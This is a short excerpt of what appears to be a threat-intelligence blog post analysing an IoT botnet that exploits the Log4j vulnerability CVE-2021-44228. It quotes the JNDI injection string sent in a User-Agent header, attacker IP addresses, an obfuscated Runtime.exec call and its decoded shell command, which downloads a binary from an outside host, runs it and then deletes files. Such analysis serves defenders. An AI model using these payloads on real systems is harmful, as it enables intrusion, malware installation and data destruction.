IoT Botnet exploiting Log4J CVE-2021-44228
Attack info:‘User-Agent’, ‘${jndi:ldap://179.43.175.101:1389/o=tomcat}’Attacker IP: 107.189.29.181 The payload is Base64 encoded: The decoded string is: The payload is a JavaScript code which is executed in Java using the ScripteEngineManager. The shell command is derived using the String.fromCharCode function:java.lang.Runtime.getRuntime().exec(String.fromCharCode(99,100,32,47,116,109,112,59,32,119,103,101,116,32,49,57,56,46,57,56,46,54,48,46,54,55,47,98,105,110,115,47,120,56,54,59,32,99,104,109,111,100,32,55,55,55,32,42,59,32,46,47,120,56,54,32,108,111,103,52,106,59,32,114,109,32,45,114,102,32,42))… The derived string is: cd /tmp; wget 198.98.60.67/bins/x86; chmod 777 *; ./x86 log4j; rm -rf * The downloaded […]
IoT Botnet exploiting Log4J CVE-2021-44228 Read More »